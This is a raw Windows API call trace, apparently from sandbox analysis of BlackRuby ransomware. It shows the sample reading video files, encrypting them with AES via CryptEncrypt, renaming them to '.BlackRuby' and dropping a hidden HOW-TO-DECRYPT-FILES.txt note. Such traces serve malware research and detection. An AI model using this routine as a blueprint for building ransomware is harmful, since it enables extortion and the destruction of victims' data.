[0063.247] SetErrorMode (uMode=0x0) returned 0x1 [0063.248] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\W3ZtvhF-FW1CW.flv", nBufferLength=0x105, lpBuffer=0x18e848, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\W3ZtvhF-FW1CW.flv", lpFilePart=0x0) returned 0x57 [0063.248] GetLastError () returned 0x5 [0063.248] SetErrorMode (uMode=0x1) returned 0x0 [0063.248] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\W3ZtvhF-FW1CW.flv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\w3ztvhf-fw1cw.flv"), fInfoLevelId=0x0, lpFileInformation=0x1c83344 | out: lpFileInformation=0x1c83344*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fc06590, ftCreationTime.dwHighDateTime=0x1d34dd7, ftLastAccessTime.dwLowDateTime=0x74904350, ftLastAccessTime.dwHighDateTime=0x1d35709, ftLastWriteTime.dwLowDateTime=0x74904350, ftLastWriteTime.dwHighDateTime=0x1d35709, nFileSizeHigh=0x0, nFileSizeLow=0x156d8)) returned 1 [0063.248] GetLastError () returned 0x5 [0063.248] SetErrorMode (uMode=0x0) returned 0x1 [0063.248] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\W3ZtvhF-FW1CW.flv", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\W3ZtvhF-FW1CW.flv", lpFilePart=0x0) returned 0x57 [0063.248] GetLastError () returned 0x5 [0063.248] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\W3ZtvhF-FW1CW.flv", nBufferLength=0x105, lpBuffer=0x18e6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\W3ZtvhF-FW1CW.flv", lpFilePart=0x0) returned 0x57 [0063.248] GetLastError () returned 0x5 [0063.248] SetErrorMode (uMode=0x1) returned 0x0 [0063.248] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\W3ZtvhF-FW1CW.flv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\w3ztvhf-fw1cw.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0063.248] GetLastError () returned 0x0 [0063.248] GetFileType (hFile=0x258) returned 0x1 [0063.248] SetErrorMode (uMode=0x0) returned 0x1 [0063.248] GetFileType (hFile=0x258) returned 0x1 [0063.248] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ec98 | out: lpFileSizeHigh=0x18ec98*=0x0) returned 0x156d8 [0063.248] GetLastError () returned 0x0 [0063.249] ReadFile (in: hFile=0x258, lpBuffer=0x2b4e8f0, nNumberOfBytesToRead=0x156d8, lpNumberOfBytesRead=0x18ec40, lpOverlapped=0x0 | out: lpBuffer=0x2b4e8f0*, lpNumberOfBytesRead=0x18ec40*=0x156d8, lpOverlapped=0x0) returned 1 [0063.250] GetLastError () returned 0x0 [0063.250] CloseHandle (hObject=0x258) returned 1 [0063.250] GetLastError () returned 0x0 [0063.250] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\W3ZtvhF-FW1CW.flv", nBufferLength=0x105, lpBuffer=0x18e7f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\W3ZtvhF-FW1CW.flv", lpFilePart=0x0) returned 0x57 [0063.250] GetLastError () returned 0x0 [0063.250] SetErrorMode (uMode=0x1) returned 0x0 [0063.251] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\W3ZtvhF-FW1CW.flv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\w3ztvhf-fw1cw.flv"), fInfoLevelId=0x0, lpFileInformation=0x18eca8 | out: lpFileInformation=0x18eca8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fc06590, ftCreationTime.dwHighDateTime=0x1d34dd7, ftLastAccessTime.dwLowDateTime=0x74904350, ftLastAccessTime.dwHighDateTime=0x1d35709, ftLastWriteTime.dwLowDateTime=0x74904350, ftLastWriteTime.dwHighDateTime=0x1d35709, nFileSizeHigh=0x0, nFileSizeLow=0x156d8)) returned 1 [0063.251] GetLastError () returned 0x0 [0063.251] SetErrorMode (uMode=0x0) returned 0x1 [0063.261] CryptImportKey (in: hProv=0x37c680, pbData=0x1cdf6b0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ebe4 | out: phKey=0x18ebe4*=0x360f60) returned 1 [0063.261] GetLastError () returned 0x0 [0063.261] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.261] GetLastError () returned 0x0 [0063.266] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.266] GetLastError () returned 0x0 [0063.266] CryptDuplicateKey (in: hKey=0x360f60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eba0 | out: phKey=0x18eba0*=0x360e20) returned 1 [0063.266] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.266] GetLastError () returned 0x0 [0063.266] CryptSetKeyParam (hKey=0x360e20, dwParam=0x4, pbData=0x1d0c6fc*=0x1, dwFlags=0x0) returned 1 [0063.266] GetLastError () returned 0x0 [0063.266] CryptSetKeyParam (hKey=0x360e20, dwParam=0x1, pbData=0x1d0c6c8, dwFlags=0x0) returned 1 [0063.266] GetLastError () returned 0x0 [0063.267] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2b797e0*, pdwDataLen=0x18ec30*=0x157d0, dwBufLen=0x157d0 | out: pbData=0x2b797e0*, pdwDataLen=0x18ec30*=0x157d0) returned 1 [0063.268] GetLastError () returned 0x0 [0063.268] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d0c758*, pdwDataLen=0x18ec48*=0x10, dwBufLen=0x10 | out: pbData=0x1d0c758*, pdwDataLen=0x18ec48*=0x10) returned 1 [0063.268] GetLastError () returned 0x0 [0063.268] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d0c788*, pdwDataLen=0x18ec50*=0x0, dwBufLen=0x10 | out: pbData=0x1d0c788*, pdwDataLen=0x18ec50*=0x10) returned 1 [0063.268] GetLastError () returned 0x0 [0063.270] CryptDestroyKey (hKey=0x360f60) returned 1 [0063.270] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0063.270] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0063.270] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\W3ZtvhF-FW1CW.flv", nBufferLength=0x105, lpBuffer=0x18e6ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\W3ZtvhF-FW1CW.flv", lpFilePart=0x0) returned 0x57 [0063.270] GetLastError () returned 0x0 [0063.270] SetErrorMode (uMode=0x1) returned 0x0 [0063.271] GetFileType (hFile=0x258) returned 0x1 [0063.271] SetErrorMode (uMode=0x0) returned 0x1 [0063.272] GetFileType (hFile=0x258) returned 0x1 [0063.272] WriteFile (in: hFile=0x258, lpBuffer=0x2bcf780*, nNumberOfBytesToWrite=0x157e0, lpNumberOfBytesWritten=0x18ec4c, lpOverlapped=0x0 | out: lpBuffer=0x2bcf780*, lpNumberOfBytesWritten=0x18ec4c*=0x157e0, lpOverlapped=0x0) returned 1 [0063.273] GetLastError () returned 0xb7 [0063.273] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\W3ZtvhF-FW1CW.flv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\w3ztvhf-fw1cw.flv"), lpNewFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\Encrypted_zg4BbP4nEBpHMPnN06qk72yu2pipFh8gMaJBoRibD9M7Dq.BlackRuby" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\encrypted_zg4bbp4nebphmpnn06qk72yu2pipfh8gmajboribd9m7dq.blackruby")) returned 1 [0063.274] GetLastError () returned 0xb7 [0063.275] SetErrorMode (uMode=0x0) returned 0x1 [0063.275] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ZT20EwIquIcX\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0063.275] GetLastError () returned 0x5 [0063.275] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0063.275] GetLastError () returned 0x5 [0063.276] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0063.276] GetLastError () returned 0x5 [0063.276] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0063.276] GetLastError () returned 0x12 [0063.276] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0063.276] SetErrorMode (uMode=0x0) returned 0x1 [0063.276] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ZT20EwIquIcX", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ZT20EwIquIcX", lpFilePart=0x0) returned 0x49 [0063.276] GetLastError () returned 0x12 [0063.276] SetErrorMode (uMode=0x1) returned 0x0 [0063.276] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ZT20EwIquIcX\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0063.276] GetLastError () returned 0x12 [0063.276] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0063.276] GetLastError () returned 0x12 [0063.277] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0063.277] GetLastError () returned 0x12 [0063.277] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0063.277] GetLastError () returned 0x12 [0063.277] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0063.277] SetErrorMode (uMode=0x0) returned 0x1 [0063.277] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ZT20EwIquIcX\\26Ey2cZn.mp4", nBufferLength=0x105, lpBuffer=0x18e848, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ZT20EwIquIcX\\26Ey2cZn.mp4", lpFilePart=0x0) returned 0x56 [0063.277] GetLastError () returned 0x12 [0063.277] SetErrorMode (uMode=0x1) returned 0x0 [0063.277] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ZT20EwIquIcX\\26Ey2cZn.mp4" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\zt20ewiquicx\\26ey2czn.mp4"), fInfoLevelId=0x0, lpFileInformation=0x1d2b4fc | out: lpFileInformation=0x1d2b4fc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bbd3150, ftCreationTime.dwHighDateTime=0x1d34df4, ftLastAccessTime.dwLowDateTime=0x67ae2230, ftLastAccessTime.dwHighDateTime=0x1d358b0, ftLastWriteTime.dwLowDateTime=0x67ae2230, ftLastWriteTime.dwHighDateTime=0x1d358b0, nFileSizeHigh=0x0, nFileSizeLow=0x649e)) returned 1 [0063.277] GetLastError () returned 0x12 [0063.277] SetErrorMode (uMode=0x0) returned 0x1 [0063.277] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ZT20EwIquIcX\\26Ey2cZn.mp4", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ZT20EwIquIcX\\26Ey2cZn.mp4", lpFilePart=0x0) returned 0x56 [0063.277] GetLastError () returned 0x12 [0063.277] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ZT20EwIquIcX\\26Ey2cZn.mp4", nBufferLength=0x105, lpBuffer=0x18e6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ZT20EwIquIcX\\26Ey2cZn.mp4", lpFilePart=0x0) returned 0x56 [0063.277] GetLastError () returned 0x12 [0063.277] SetErrorMode (uMode=0x1) returned 0x0 [0063.278] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ZT20EwIquIcX\\26Ey2cZn.mp4" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\zt20ewiquicx\\26ey2czn.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0063.278] GetLastError () returned 0x0 [0063.278] GetFileType (hFile=0x258) returned 0x1 [0063.278] SetErrorMode (uMode=0x0) returned 0x1 [0063.278] GetFileType (hFile=0x258) returned 0x1 [0063.278] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ec98 | out: lpFileSizeHigh=0x18ec98*=0x0) returned 0x649e [0063.278] GetLastError () returned 0x0 [0063.278] ReadFile (in: hFile=0x258, lpBuffer=0x1d2d07c, nNumberOfBytesToRead=0x649e, lpNumberOfBytesRead=0x18ec40, lpOverlapped=0x0 | out: lpBuffer=0x1d2d07c*, lpNumberOfBytesRead=0x18ec40*=0x649e, lpOverlapped=0x0) returned 1 [0063.279] GetLastError () returned 0x0 [0063.279] CloseHandle (hObject=0x258) returned 1 [0063.279] GetLastError () returned 0x0 [0063.279] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ZT20EwIquIcX\\26Ey2cZn.mp4", nBufferLength=0x105, lpBuffer=0x18e7f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ZT20EwIquIcX\\26Ey2cZn.mp4", lpFilePart=0x0) returned 0x56 [0063.279] GetLastError () returned 0x0 [0063.279] SetErrorMode (uMode=0x1) returned 0x0 [0063.279] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ZT20EwIquIcX\\26Ey2cZn.mp4" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\zt20ewiquicx\\26ey2czn.mp4"), fInfoLevelId=0x0, lpFileInformation=0x18eca8 | out: lpFileInformation=0x18eca8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bbd3150, ftCreationTime.dwHighDateTime=0x1d34df4, ftLastAccessTime.dwLowDateTime=0x67ae2230, ftLastAccessTime.dwHighDateTime=0x1d358b0, ftLastWriteTime.dwLowDateTime=0x67ae2230, ftLastWriteTime.dwHighDateTime=0x1d358b0, nFileSizeHigh=0x0, nFileSizeLow=0x649e)) returned 1 [0063.279] GetLastError () returned 0x0 [0063.279] SetErrorMode (uMode=0x0) returned 0x1 [0063.279] CryptAcquireContextW (in: phProv=0x18ec08, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ec08*=0x37c818) returned 1 [0063.279] GetLastError () returned 0x0 [0063.316] CryptImportKey (in: hProv=0x37c818, pbData=0x1b8ebe0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ebe4 | out: phKey=0x18ebe4*=0x360ee0) returned 1 [0063.316] GetLastError () returned 0x0 [0063.316] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.316] GetLastError () returned 0x0 [0063.321] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.321] GetLastError () returned 0x0 [0063.321] CryptDuplicateKey (in: hKey=0x360ee0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eba0 | out: phKey=0x18eba0*=0x360a20) returned 1 [0063.321] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.321] GetLastError () returned 0x0 [0063.321] CryptSetKeyParam (hKey=0x360a20, dwParam=0x4, pbData=0x1bbbc2c*=0x1, dwFlags=0x0) returned 1 [0063.321] GetLastError () returned 0x0 [0063.321] CryptSetKeyParam (hKey=0x360a20, dwParam=0x1, pbData=0x1bbbbf8, dwFlags=0x0) returned 1 [0063.321] GetLastError () returned 0x0 [0063.321] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bbbc74*, pdwDataLen=0x18ec30*=0x6590, dwBufLen=0x6590 | out: pbData=0x1bbbc74*, pdwDataLen=0x18ec30*=0x6590) returned 1 [0063.321] GetLastError () returned 0x0 [0063.321] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bc87c0*, pdwDataLen=0x18ec48*=0x10, dwBufLen=0x10 | out: pbData=0x1bc87c0*, pdwDataLen=0x18ec48*=0x10) returned 1 [0063.321] GetLastError () returned 0x0 [0063.321] CryptEncrypt (in: hKey=0x360a20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bc87f0*, pdwDataLen=0x18ec50*=0x0, dwBufLen=0x10 | out: pbData=0x1bc87f0*, pdwDataLen=0x18ec50*=0x10) returned 1 [0063.321] GetLastError () returned 0x0 [0063.321] CryptDestroyKey (hKey=0x360ee0) returned 1 [0063.321] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0063.321] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0063.321] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ZT20EwIquIcX\\26Ey2cZn.mp4", nBufferLength=0x105, lpBuffer=0x18e6ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ZT20EwIquIcX\\26Ey2cZn.mp4", lpFilePart=0x0) returned 0x56 [0063.321] GetLastError () returned 0x0 [0063.321] SetErrorMode (uMode=0x1) returned 0x0 [0063.321] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ZT20EwIquIcX\\26Ey2cZn.mp4" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\zt20ewiquicx\\26ey2czn.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0063.322] GetLastError () returned 0xb7 [0063.322] GetFileType (hFile=0x258) returned 0x1 [0063.322] SetErrorMode (uMode=0x0) returned 0x1 [0063.322] GetFileType (hFile=0x258) returned 0x1 [0063.323] CloseHandle (hObject=0x258) returned 1 [0063.324] GetLastError () returned 0xb7 [0063.324] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ZT20EwIquIcX\\26Ey2cZn.mp4", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ZT20EwIquIcX\\26Ey2cZn.mp4", lpFilePart=0x0) returned 0x56 [0063.324] GetLastError () returned 0xb7 [0063.324] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ZT20EwIquIcX\\Encrypted_6MgAhJbcf23aT70PNvrriGowxTvOD0I09Pfs.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ZT20EwIquIcX\\Encrypted_6MgAhJbcf23aT70PNvrriGowxTvOD0I09Pfs.BlackRuby", lpFilePart=0x0) returned 0x82 [0063.324] GetLastError () returned 0xb7 [0063.324] SetErrorMode (uMode=0x1) returned 0x0 [0063.324] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ZT20EwIquIcX\\26Ey2cZn.mp4" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\zt20ewiquicx\\26ey2czn.mp4"), fInfoLevelId=0x0, lpFileInformation=0x18ec90 | out: lpFileInformation=0x18ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bbd3150, ftCreationTime.dwHighDateTime=0x1d34df4, ftLastAccessTime.dwLowDateTime=0x67ae2230, ftLastAccessTime.dwHighDateTime=0x1d358b0, ftLastWriteTime.dwLowDateTime=0x2df11e80, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x65a0)) returned 1 [0063.324] GetLastError () returned 0xb7 [0063.324] SetErrorMode (uMode=0x0) returned 0x1 [0063.324] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ZT20EwIquIcX\\26Ey2cZn.mp4" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\zt20ewiquicx\\26ey2czn.mp4"), lpNewFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ZT20EwIquIcX\\Encrypted_6MgAhJbcf23aT70PNvrriGowxTvOD0I09Pfs.BlackRuby" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\zt20ewiquicx\\encrypted_6mgahjbcf23at70pnvrrigowxtvod0i09pfs.blackruby")) returned 1 [0063.324] GetLastError () returned 0xb7 [0063.325] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ZT20EwIquIcX\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e6f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ZT20EwIquIcX\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x62 [0063.325] GetLastError () returned 0xb7 [0063.325] SetErrorMode (uMode=0x1) returned 0x0 [0063.325] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ZT20EwIquIcX\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\zt20ewiquicx\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0063.327] GetLastError () returned 0x0 [0063.327] GetFileType (hFile=0x258) returned 0x1 [0063.327] SetErrorMode (uMode=0x0) returned 0x1 [0063.327] GetFileType (hFile=0x258) returned 0x1 [0063.328] CloseHandle (hObject=0x258) returned 1 [0063.328] GetLastError () returned 0x0 [0063.328] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ZT20EwIquIcX\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e81c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ZT20EwIquIcX\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x62 [0063.328] GetLastError () returned 0x0 [0063.328] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ZT20EwIquIcX\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0063.328] GetLastError () returned 0x0 [0063.329] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst", nBufferLength=0x105, lpBuffer=0x18e994, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst", lpFilePart=0x0) returned 0x2a [0063.329] GetLastError () returned 0x0 [0063.329] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0063.329] GetLastError () returned 0x0 [0063.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e8b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0063.329] GetLastError () returned 0x0 [0063.329] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst", lpFilePart=0x0) returned 0x2a [0063.329] GetLastError () returned 0x0 [0063.329] SetErrorMode (uMode=0x1) returned 0x0 [0063.329] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\XvI_eeDWW LzfT5lst\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ee0 [0063.329] GetLastError () returned 0x0 [0063.329] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0063.329] 